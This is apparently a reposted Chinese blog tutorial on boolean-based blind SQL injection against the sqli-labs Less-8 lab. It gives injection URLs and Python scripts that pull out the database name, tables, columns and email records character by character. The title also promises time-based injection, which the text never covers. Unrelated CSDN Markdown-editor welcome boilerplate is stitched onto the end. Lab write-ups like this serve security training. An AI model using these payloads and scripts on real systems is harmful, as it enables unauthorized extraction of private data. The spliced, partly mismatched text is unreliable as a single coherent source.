sql注入基于布尔/时间的盲注详解

分享一下我老师大神的人工智能教程！零基础，通俗易懂！http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识，造福人民，实现我们中华民族伟大复兴！

本来想自己总结写一篇的，发现有篇写的很好，转载mark一个~

原文链接：http://www.jb51.net/article/93445.htm

基于布尔的盲注

Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。

由于本次是布尔注入，手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入，得到数据。所以在这章里面会有很多的Python代码。

本次的示例就是Less-8。

通过进行下面的语句的注入测试

http://localhost/sqlilabs/Less-8/?id=2'http://localhost/sqlilabs/Less-8/?id=2"http://localhost/sqlilabs/Less-8/?id=2

进行测试的时候，只有在id=2'的时候页面无法显示内容。输入的语句如果符合要求，页面就会显示内容，但是显示的内容都是一样的。这种情况下页面上的输出对于我们来说是完全没有用的，包括SQL执行出错的信息都不会在页面上显示。这种情况下之前的通过执行SQL语句然后在页面上显示SQL执行之后返回的信息完全是不可能的啦。这种情况下就是一个典型的SQL盲注了。

我们通过页面是否显示内容来判断我们的SQL语句是否正确，进而猜解数据库的信息。

通过上面的注入测试，我们知道后台的SQL的注入语句的写法是:

select field from table where id='userinput'

id参数是被单引号包括的。其他的信息我们就无法得到了。

得到数据库的名称

在得到数据库的名称之前，首先需要得到数据库的长度

http://localhost/sqlilabs/Less-8/?id=2' and length(database())>1 %23http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2 %23以此类推.....

发现当值为8的时候，页面就没有显示。那么说明database()的长度是8。

得到了datbase()的长度之后，接下来就是得到database()的名称了。

这个时候就不能完全靠手注了，必须编写Python代码来完成。其中最主要就是进行大量的注入测试来判断程序执行正确和出错的时机，然后断定当前的值可能就是正确的值。

下面就是一个简单的使用Python来进行布尔盲注获取数据的代码。

def get_db_name(): result = "" url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr(database(),{0},1))>{1} %23" chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' for i in range(1,9):  for char in chars:   char_ascii = ord(char)   url = url_template.format(i,char_ascii)   response = requests.get(url)   length = len(response.text)   #返回的长度只有706和722   if length>706:    result += char    break print(result)

得到最后的结果的是security，是正确的。

得到数据库中的表信息

其实所有的SQL注入步骤都是类似的。首先得到数据库的名称(这一步不是必须的)，然后得到当前数据库的表名称，然后得到表的字段，最后进行脱裤。这个步骤在前面已经有说明了。

首先看一个简单的SQL盲注获取数据库表信息的写法。

http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23

其实还是使用之前的select table_name from information_schema.tables where table_schema=database() limit 0,1这样的语句来得到表的信息，但是现在是无法在页面上显示的，而是通过盲注来一个字符一个字符的获取表名。

接下也同样是通过编写Python代码来获取表名了。代码也和上面的类似。主要就是修改中的URl。在进行Python获取表名之前，我们同样需要知道表名的长度。

使用如下的语句就可以得到了。

获取表名的SQL注入的写法就是如下

http://localhost/sqlilabs/Less-8/?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23

通过这种方式我们知道数据库表中的第一个表名的长度是6。知道了表名的长度之后，接下来的Python脚本就很好写了。

def get_table_name(): result = "" url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))>{1} %23" chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' for i in range(1,7):  for char in chars:   char_ascii = ord(char)   url = url_template.format(i,char_ascii)   response = requests.get(url)   length = len(response.text)   #返回的长度只有706和722   if length>706:    result += char    break print(result)

最后得到了第一个表名是emails,如果要得到其他的表名只需要将代码limit 0,1修改成为limit 1,1或者是其他的就可以了。

得到表名的列信息

在得到列名之前，同样需要知道在表中的字段长度。例如我们想要知道在emails表中的长度，那么就可以使用如下的语句来获取。

http://localhost/sqlilabs/Less-8/?id=2' and (select length(column_name) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)>【num】 %23

修改num的值即可，从0开始一直到到程序出错。通过这种方法，我们得到在emails中存在2个字段，字段的长度分别是2，8。
得到了字段长度之后，接下来就是进行布尔注入得到字段名称了。

在编写代码之前，还是来看如何写获取字段名称的sql语句吧。下面这个代码就是用来获取字段名称的代码。

http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),1,1))>60 %23

我们编写的Python代码也是利用上面这个代码来获取字段名称。

def get_column_name(): result = "" url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),{0},1))>{1} %23" chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz' for i in range(1,3):  for char in chars:   char_ascii = ord(char)   url = url_template.format(i,char_ascii)   response = requests.get(url)   length = len(response.text)   #返回的长度只有706和722   if length>706:    result += char    break print(result)

通过上面这个代码，我们可以得到在emails表中存在的字段名称分别是id和email_id

脱裤

在得到了字段名称之后，接下来最重要的一步就是进行脱裤了。
在进行脱裤之前，我们首先判断在emails表中有多少条记录。

使用的语句如下：

http://localhost/sqlilabs/Less-8/?id=2' and (select count(*) from emails)>0 %2

修改>0中的0依次为1，2，3之后，我们得到在emails表中一共存在8条记录。

那么接下来就是进行脱裤了。

在脱裤之前，我们首先要知道当前记录的长度，这个SQL语句也很好写。

http://localhost/sqlilabs/Less-8/?id=2' and (select length(email_id) from emails limit 0,1)>15 %23

最后我们知道在emails表中的第一条记录中的email_id的长度是16.

知道了长度之后，代码就很好写了。

def get_data(): result = "" url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select email_id from emails limit 0,1),{0},1))>{1} %23" chars = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz' for i in range(1,17):  for char in chars:   char_ascii = ord(char)   url = url_template.format(i,char_ascii)   response = requests.get(url)   length = len(response.text)   #返回的长度只有706和722   if length>706:    result += char    break print(result)

通过上面的这段代码就得到了内容是[email protected],其他的内容就同样通过这段方式得到数据了。这里就不作演示了。

总结

其实基于布尔盲注和基于时间的盲注都是需要编写大量的代码，就像本篇的文章一样。之前在简单的SQL注入中，一句SQL注入代码就可以解决的问题在这里就需要编写Python代码来进行大量的注入测试才能够得到内容。其实之前我也很少完整的用Python来编写SQL注入代码完成整个布尔盲注的注入过程。通过本章的编写，熟悉了使用Python代码完整地进行一次布尔盲注的过程了，学习了很多。以上就是这篇文章的全部内容了，希望对大家能有所帮助。

给我老师的人工智能教程打call！http://blog.csdn.net/jiangjunshow

你好！这是你第一次使用 **Markdown编辑器** 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章，了解一下Markdown的基本语法知识。

新的改变

我们对Markdown编辑器进行了一些功能拓展与语法支持，除了标准的Markdown编辑器功能，我们增加了如下几点新功能，帮助你用它写博客：

全新的界面设计 ，将会带来全新的写作体验；
在创作中心设置你喜爱的代码高亮样式，Markdown 将代码片显示选择的高亮样式 进行展示；
增加了 图片拖拽 功能，你可以将本地的图片直接拖拽到编辑区域直接展示；
全新的 KaTeX数学公式 语法；
增加了支持甘特图的mermaid语法¹ 功能；
增加了 多屏幕编辑 Markdown文章功能；
增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能，功能按钮位于编辑区域与预览区域中间；
增加了 检查列表 功能。

功能快捷键

撤销：Ctrl/Command + Z
重做：Ctrl/Command + Y
加粗：Ctrl/Command + B
斜体：Ctrl/Command + I
标题：Ctrl/Command + Shift + H
无序列表：Ctrl/Command + Shift + U
有序列表：Ctrl/Command + Shift + O
检查列表：Ctrl/Command + Shift + C
插入代码：Ctrl/Command + Shift + K
插入链接：Ctrl/Command + Shift + L
插入图片：Ctrl/Command + Shift + G

合理的创建标题，有助于目录的生成

直接输入1次#，并按下space后，将生成1级标题。
输入2次#，并按下space后，将生成2级标题。
以此类推，我们支持6级标题。有助于使用TOC语法后生成一个完美的目录。

如何改变文本的样式

强调文本 强调文本

加粗文本 加粗文本

标记文本

~~删除文本~~

引用文本

H₂O is是液体。

2¹⁰ 运算结果是 1024.

插入链接与图片

链接: link.

图片:

带尺寸的图片:

当然，我们为了让用户更加便捷，我们增加了图片拖拽功能。

如何插入一段漂亮的代码片

去博客设置页面，选择一款你喜欢的代码片高亮样式，下面展示同样高亮的 代码片.

// An highlighted block var foo = 'bar';

生成一个适合你的列表

项目
- 项目
  - 项目

项目1
项目2
项目3

计划任务
完成任务

创建一个表格

一个简单的表格是这么创建的：

项目	Value
电脑	$1600
手机	$12
导管	$1

设定内容居中、居左、居右

使用:---------:居中
使用:----------居左
使用----------:居右

第一列	第二列	第三列
第一列文本居中	第二列文本居右	第三列文本居左

SmartyPants

SmartyPants将ASCII标点字符转换为“智能”印刷标点HTML实体。例如：

TYPE	ASCII	HTML
Single backticks	`'Isn't this fun?'`	‘Isn’t this fun?’
Quotes	`"Isn't this fun?"`	“Isn’t this fun?”
Dashes	`-- is en-dash, --- is em-dash`	– is en-dash, — is em-dash

创建一个自定义列表

Markdown: Text-to- HTML conversion tool
Authors: John; Luke

如何创建一个注脚

一个具有注脚的文本。²

注释也是必不可少的

Markdown将文本转换为 HTML。

KaTeX数学公式

您可以使用渲染LaTeX数学表达式 KaTeX:

Gamma公式展示 $\Gamma(n) = (n-1)!\quad\forall n\in\mathbb N$ 是通过欧拉积分

$\Gamma(z) = \int_0^\infty t^{z-1}e^{-t}dt\,.$

你可以找到更多关于的信息 LaTeX 数学表达式here.

新的甘特图功能，丰富你的文章

gantt
        dateFormat  YYYY-MM-DD
        title Adding GANTT diagram functionality to mermaid
        section 现有任务
        已完成               :done,    des1, 2014-01-06,2014-01-08
        进行中               :active,  des2, 2014-01-09, 3d
        计划一               :         des3, after des2, 5d
        计划二               :         des4, after des3, 5d

关于 甘特图 语法，参考这儿,

UML 图表

可以使用UML图表进行渲染。 Mermaid. 例如下面产生的一个序列图：:

这将产生一个流程图。:

关于 Mermaid 语法，参考这儿,

FLowchart流程图

我们依旧会支持flowchart的流程图：

关于 Flowchart流程图 语法，参考这儿.

导出与导入

导出

如果你想尝试使用此编辑器, 你可以在此篇文章任意编辑。当你完成了一篇文章的写作, 在上方工具栏找到 文章导出 ，生成一个.md文件或者.html文件进行本地保存。

导入

如果你想加载一篇你写过的.md文件或者.html文件，在上方工具栏可以选择导入功能进行对应扩展名的文件导入，
继续你的创作。

mermaid语法说明 ↩︎
注脚的解释 ↩︎